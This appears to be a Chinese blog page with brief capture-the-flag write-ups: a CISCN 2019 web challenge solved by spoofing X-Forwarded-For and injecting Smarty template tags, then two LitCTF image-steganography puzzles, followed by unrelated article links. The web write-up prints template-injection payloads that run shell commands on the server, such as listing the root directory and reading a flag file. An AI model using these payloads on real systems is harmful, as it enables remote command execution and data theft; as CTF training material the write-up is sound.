当前位置: 首页 > news >正文

[CISCN 2019华东南]Web11

 [CISCN 2019华东南]Web11 

给了两个链接但是都无法访问

这里我们直接抓包试一下

我们插入X-Forwarded-For:127.0.0.1

发现可以修改了右上角的IP地址,从而可以进行注入

{$smarty.version} 查看版本号

if标签执行PHP命令

{if phpinfo()}{/if} 查看协议

{if system('ls /')}{/if} 找到当前页面的内容发现了有flag文件

{if system('cat /flag')}{/if} 查看flag

NSSCTF{961ca109-7c71-45ec-9c8a-469ab90cbc1e}

[LitCTF 2023]404notfound (初级)

这是一个图片隐写题

下载后得到一个图片,看起来没什么用

先用记事本打开看一下直接就发现了flag

NSSCTF{Its_404_but_1ts_n0t_a_page}

[LitCTF 2023]这羽毛球怎么只有一半啊(恼 (初级)

下载后给了一个图片,让我们找她的下半身,这里吧高度调整就好

直接把这个图片放到 随波逐流就出来了

NSSCTF{Fl4g_0fcourse!}

http://www.lryc.cn/news/496034.html

相关文章:

  • Cypress内存溢出奔溃问题汇总
  • 树莓派4B--OpenCV安装踩坑
  • 电子电气架构 --- 面向服务的汽车诊断架构
  • Pytest --capture 参数详解:如何控制测试执行过程中的输出行为
  • IS-IS的原理
  • C++(4个类型转换)
  • Ubuntu20.04安装NVIDIA显卡驱动
  • 速盾:介绍一下高防cdn的缓存响应事什么功能?
  • Nuclei-快速漏洞扫描器
  • linux网络抓包工具
  • 详解桥接模式
  • 探索AI新世界!热门工具与学习资源免费获取
  • vue3项目搭建-6-axios 基础配置
  • Django 视图层
  • 代理IP与百度在信息时代的交互
  • 1、Three.js开端准备环境
  • 什么是Batch Normalization?
  • 十四(AJAX)、AJAX、axios、常用请求方法(GET POST...)、HTTP协议、接口文档、form-serialize
  • vue2怎么写computed属性
  • 【从零开始的LeetCode-算法】35. 搜索插入位置
  • vscode + conda + qt联合开发
  • 技术总结(四十三)
  • mac终端自定义命令打开vscode
  • 代码设计:设计模式:应对变化
  • Proteus中添加新元件库
  • Hive学习基本概念
  • 运维工程师.云计算工程师面试题.考试题
  • 四、初识C语言(4)
  • 解决爬虫ConnectionResetError出现的问题
  • Qt桌面应用开发 第十天(综合项目二 翻金币)